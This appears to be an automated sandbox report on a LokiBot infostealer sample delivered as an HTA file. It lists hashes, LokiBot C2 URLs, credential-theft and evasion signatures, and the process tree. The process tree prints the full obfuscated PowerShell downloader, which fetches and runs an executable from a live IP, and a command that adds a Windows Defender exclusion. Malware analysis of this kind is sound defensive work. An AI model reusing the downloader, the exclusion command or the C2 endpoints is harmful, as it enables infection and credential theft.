Analysis
-
max time kernel
98s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-11-2024 07:26
Static task
static1
Behavioral task
behavioral1
Sample
9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac.hta
Resource
win10v2004-20241007-en
General
-
Target
9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac.hta
-
Size
23KB
-
MD5
ec0d423a3f72d69975a1e31a275f5377
-
SHA1
213922fb8456ecaadc24889afec1ac6ef5010c68
-
SHA256
9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac
-
SHA512
8132f567abfd4e3489204d1f3a9fc8292457ce10495345cd0ccfa8074233411c8305c4d73078a7dee02b086fbc22b8ad7047dd4bc127de337d0800771edf53ad
-
SSDEEP
96:C2vy2KJTuvPTTwduJZA6/3P42e2+ip2k+:TLwuv6QP5f+F3
Malware Config
Extracted
lokibot
http://94.156.177.41/maxzi/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Lokibot family
-
Blocklisted process makes network request 1 IoCs
Processes:
poWERShell.eXeflow pid Process 14 1060 poWERShell.eXe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
Processes:
poWERShell.eXepowershell.exepid Process 1060 poWERShell.eXe 5028 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exewininit.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation wininit.exe -
Executes dropped EXE 2 IoCs
Processes:
wininit.exewininit.exepid Process 4576 wininit.exe 2120 wininit.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
wininit.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wininit.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook wininit.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wininit.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
wininit.exedescription pid Process procid_target PID 4576 set thread context of 2120 4576 wininit.exe 106 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.execsc.execvtres.exewininit.exepowershell.exemshta.exepoWERShell.eXedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wininit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language poWERShell.eXe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
poWERShell.eXepowershell.exepowershell.exepid Process 1060 poWERShell.eXe 1060 poWERShell.eXe 5028 powershell.exe 5028 powershell.exe 3804 powershell.exe 3804 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
poWERShell.eXepowershell.exepowershell.exewininit.exedescription pid Process Token: SeDebugPrivilege 1060 poWERShell.eXe Token: SeDebugPrivilege 5028 powershell.exe Token: SeDebugPrivilege 3804 powershell.exe Token: SeDebugPrivilege 2120 wininit.exe -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
mshta.exepoWERShell.eXecsc.exewininit.exedescription pid Process procid_target PID 2068 wrote to memory of 1060 2068 mshta.exe 83 PID 2068 wrote to memory of 1060 2068 mshta.exe 83 PID 2068 wrote to memory of 1060 2068 mshta.exe 83 PID 1060 wrote to memory of 5028 1060 poWERShell.eXe 85 PID 1060 wrote to memory of 5028 1060 poWERShell.eXe 85 PID 1060 wrote to memory of 5028 1060 poWERShell.eXe 85 PID 1060 wrote to memory of 2572 1060 poWERShell.eXe 92 PID 1060 wrote to memory of 2572 1060 poWERShell.eXe 92 PID 1060 wrote to memory of 2572 1060 poWERShell.eXe 92 PID 2572 wrote to memory of 3436 2572 csc.exe 93 PID 2572 wrote to memory of 3436 2572 csc.exe 93 PID 2572 wrote to memory of 3436 2572 csc.exe 93 PID 1060 wrote to memory of 4576 1060 poWERShell.eXe 96 PID 1060 wrote to memory of 4576 1060 poWERShell.eXe 96 PID 1060 wrote to memory of 4576 1060 poWERShell.eXe 96 PID 4576 wrote to memory of 3804 4576 wininit.exe 104 PID 4576 wrote to memory of 3804 4576 wininit.exe 104 PID 4576 wrote to memory of 3804 4576 wininit.exe 104 PID 4576 wrote to memory of 2120 4576 wininit.exe 106 PID 4576 wrote to memory of 2120 4576 wininit.exe 106 PID 4576 wrote to memory of 2120 4576 wininit.exe 106 PID 4576 wrote to memory of 2120 4576 wininit.exe 106 PID 4576 wrote to memory of 2120 4576 wininit.exe 106 PID 4576 wrote to memory of 2120 4576 wininit.exe 106 PID 4576 wrote to memory of 2120 4576 wininit.exe 106 PID 4576 wrote to memory of 2120 4576 wininit.exe 106 PID 4576 wrote to memory of 2120 4576 wininit.exe 106 -
outlook_office_path 1 IoCs
Processes:
wininit.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wininit.exe -
outlook_win_path 1 IoCs
Processes:
wininit.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wininit.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe"C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5028
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2zok10q1\2zok10q1.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC0B0.tmp" "c:\Users\Admin\AppData\Local\Temp\2zok10q1\CSCC6FFF3FB49CF4AC089F230B1A9191D11.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:3436
-
-
-
C:\Users\Admin\AppData\Roaming\wininit.exe"C:\Users\Admin\AppData\Roaming\wininit.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wininit.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3804
-
-
C:\Users\Admin\AppData\Roaming\wininit.exe"C:\Users\Admin\AppData\Roaming\wininit.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2120
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
17KB
MD506bf76aebd48517abefa40848a7ba78c
SHA1c691b71e5a3c7d344bd7b316639255f513a65bde
SHA25630fd548b29ea50743e8a7f30d857204ab77b998a01a78fce5b781d50aeb53007
SHA51222521c7e918e8729854be38fef52a381f0e7abcd831b615840abc7d029fe540df0f25c0abaf26f6f74edc526e38671fc1b9c246892061c521fee8e2d5ba8effd
-
Filesize
3KB
MD5bdc4191d3930a6b00074014901690d61
SHA1be55df7bcf08a5af776090d08773eb4637d52ce0
SHA2567122907cd5c735215ed115715e5dea0a62b27d5c40731a45db667de4fc460664
SHA51277a704f978d1fbebcf6af6569897a15f08cc7a80dd5535eb1770038248cc5e0234dd3fd73f3e288bebd31848e5f488072b77a17cb2288d7ee585297c92724374
-
Filesize
1KB
MD5733da47f9457539c32b40167d4986999
SHA13c241a994a9cc7ed9b74a4ac7ffacb6a8e2c89dc
SHA256c2056e6797915ab848680297f93653d45d727890ac6f81b0eeb82b73f0b4bcdb
SHA51205400d0c844dfccb3d863eec1447122f490f9c897ff05d620e28cf0766293208ad25bd5f6df5d048ed5c579334907e3eac1e785dd01aba436ed1b59d9ae44504
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1045960512-3948844814-3059691613-1000\0f5007522459c86e95ffcc62f32308f1_a4172161-d53d-48af-8f36-a00b057e74d4
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1045960512-3948844814-3059691613-1000\0f5007522459c86e95ffcc62f32308f1_a4172161-d53d-48af-8f36-a00b057e74d4
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
Filesize
586KB
MD566b03d1aff27d81e62b53fc108806211
SHA12557ec8b32d0b42cac9cabde199d31c5d4e40041
SHA25659586e753c54629f428a6b880f6aff09f67af0ace76823af3627dda2281532e4
SHA5129f8ef3dd8c482debb535b1e7c9155e4ab33a04f8c4f31ade9e70adbd5598362033785438d5d60c536a801e134e09fcd1bc80fc7aed2d167af7f531a81f12e43d
-
Filesize
480B
MD5b0517586f4097114e790c61f2685f0d5
SHA120f7482298ab96731228ebd5242ceddfd72ff50f
SHA256a738e3af6f29edd637630b0299f306056042ea1c73850eee95498499f5d90237
SHA512c28702017ce7fe0d34bea38cef48df3bb65c63d92dddd6f8264f7262f7ae61b8d71bcd6fec06d0792373d15ba84fb2a1d0c26b0fe5755bc20505a9197d654ba0
-
Filesize
369B
MD5308de75983cfb735437e7ef2fcd22fdc
SHA1792557d8146554313a512884bba97de0a0da1004
SHA256a60baf2881687a0e4747b07dab04d124931f3413f39413d9f23042ae3a8e57bd
SHA5123abbd4cd5cf6e87bfaf46e06d15adcefd85708595468d28f32fd7e24b00773dbd3f28dd08505b95c46e70fe1c6d74020349da32883852d7b0d188f68e800fc83
-
Filesize
652B
MD532e3edd00eba9ec2c6a1c35bd2750dc3
SHA1d7e33c5dea35e2688c1a9ad3f39665c9411a32d2
SHA2569c43e19e5726a2ee69462600b6b95aefe54935a8c13d3d700f153f5310e1f5a6
SHA512ec1b07f0baa9848eed0087904effeb9ceb8db251bd6616fa850d630bde3c16810e47dac86de22b9a1173952cb72c8eb99519c78be1bffc259d409a7814c4f604